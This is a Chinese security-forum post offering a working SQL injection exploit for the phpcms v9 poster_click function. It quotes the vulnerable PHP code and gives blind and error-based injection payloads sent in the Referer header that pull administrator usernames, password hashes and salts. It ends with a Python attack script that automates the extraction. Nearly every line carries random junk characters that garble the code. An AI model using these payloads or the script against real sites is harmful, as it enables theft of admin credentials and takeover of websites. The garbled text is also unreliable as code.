中国网络渗透测试联盟

标题: phpcms post_click注入0day利用代码 [打印本页]
作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:9 j2 n2 I8 T. ^5 `4 P6 h
- v! c0 w3 I2 _4 f- p# K
问题函数\phpcms\modules\poster\index.php  N5 X6 Y; a6 Z- d  p. B

5 x9 ]$ V+ ^! Zpublic function poster_click() {
* N7 N$ @* E4 T& p, s$id = isset($_GET['id']) ? intval($_GET['id']) : 0;4 ^+ m5 v2 \/ G* E
$r = $this->db->get_one(array('id'=>$id));
) h  o- k" ]4 t* y! p1 L9 \if (!is_array($r) && empty($r)) return false;3 K3 C/ D; t) h
$ip_area = pc_base::load_sys_class('ip_area');
2 x+ b: \& w- Q0 X$ P+ B$ip = ip();5 @5 ?- U5 i8 k: n" V, W2 J! G' x
$area = $ip_area->get($ip);. }) ^. B/ P3 ?3 A" C2 D& L
$username = param::get_cookie('username') ? param::get_cookie('username') : '';5 Q# w4 Q) r" w6 `; P
if($id) {
, O; h- f7 h, u% o' w. E8 p4 V$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
3 h! z% j. J* w) {. D) Q7 V$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
) i7 I$ |0 Q9 D- w6 O}* ~0 N  l. M: X* P
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
' _) \: |' }* f$setting = string2array($r['setting']);
9 n1 H8 P! z1 v7 [( d, |if (count($setting)==1) {
; a  S- A6 H4 s" F. t9 q6 `+ r7 o$url = $setting['1']['linkurl'];: q8 I3 L# J" ?! f& F- Y+ f
} else {( `3 @+ t+ R9 {8 C8 `
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
. y7 Z; z: P; Z- e7 S- ~}) A1 k6 i, E2 t; I/ b% _
header('Location: '.$url);3 ^/ n5 q1 K6 z+ o
}4 q  O! q* v3 p! _
1 c5 i/ v& ?$ S5 f9 l  V

# k: M% N# b: m
, b7 O' N6 d- c! ~4 x( e利用方式:
& F# h. B7 T% m) t1 A/ f( o2 r& D& s* O, v" ?2 R0 O
1、可以采用盲注入的手法:
+ G" |  ^0 }! O6 D
. y. h( e* l/ i4 Lreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#& N3 w3 ^+ \% f! f
9 f/ q$ o# z! v3 T
通过返回页面,正常与否一个个猜解密码字段。
1 c' D+ S, x* g& ?0 k
( ]( N/ ~/ `$ L! S& _, x2、代码是花开写的,随手附上了:
6 ~+ D  z5 r; V/ m
6 L% T. A& {! }1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
9 ^' ]! E/ `& j3 O3 T# f; z! V; G" J: V5 P, _" i
此方法是爆错注入手法,原理自查。; H) m/ }3 {; S& y* Q

' D. K) q8 V& X
1 e7 N3 h; W8 x: y5 Y' W( H# s0 O( B
利用程序:, a! D1 B% I% c6 N

* w) ^; Q- S; z: D! x#!/usr/bin/env python3 C: ]$ a0 I: c4 e
import httplib,sys,re
  ~6 G3 T5 F* Y0 }9 c. Y. B1 G+ r; `  s4 U3 Y
def attack():# v" T2 r$ L. E6 J+ f, o
print “Code by Pax.Mac Team conqu3r!”2 b) J5 B$ j5 T/ e* |6 c
print “Welcome to our zone!!!”8 X8 t3 }2 \8 \: h3 W/ q7 k& j( |) P$ x. p
url=sys.argv[1]+ ^& b, j- z) w1 y! M! B
paths=sys.argv[2]6 K6 G1 d, H! ?6 T- p; D
conn = httplib.HTTPConnection(url)
+ H- h5 Q& r/ @. x3 B, ~i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,5 d' ^  |# A* s& P3 ^2 a
“Accept”: “text/plain”,
$ p7 t) P& u9 R8 c5 f, h“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}3 O. U8 Z) A/ r* D& L7 d1 b& c
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)! H. m( B0 N: u1 u3 N
r1 = conn.getresponse()
% V. h5 M  U, q$ Xdatas=r1.read()
4 t% a+ [/ K# wdatas=re.findall(r”Duplicate entry \’\w+’”, datas)1 b: K) R7 L2 t: C; b
print datas[0]
7 Y4 ^1 Z, D$ a" L5 ^conn.close()8 l$ R- ?) q* a; K4 H
if __name__==”__main__”:
" `& ]- ]- f$ G8 ?if len(sys.argv)<3:; z6 k7 s- F$ e
print “Code by Pax.Mac Team conqu3r”
8 K/ ^1 I% B2 V0 C: lprint “Usgae:”7 R- W9 U1 J1 p6 |/ M
print “    phpcmsattack.py   www.paxmac.org /”. V0 r9 u+ O2 C: S) C: {
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”( W% q' q' I- G. e8 U- u5 s( ~0 Y
sys.exit(1)
# Q+ |/ Y' D6 G$ dattack()) ^9 a& o* \/ j$ p; N% d7 d
3 F* X7 E1 f7 H3 [/ z! V+ Q




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2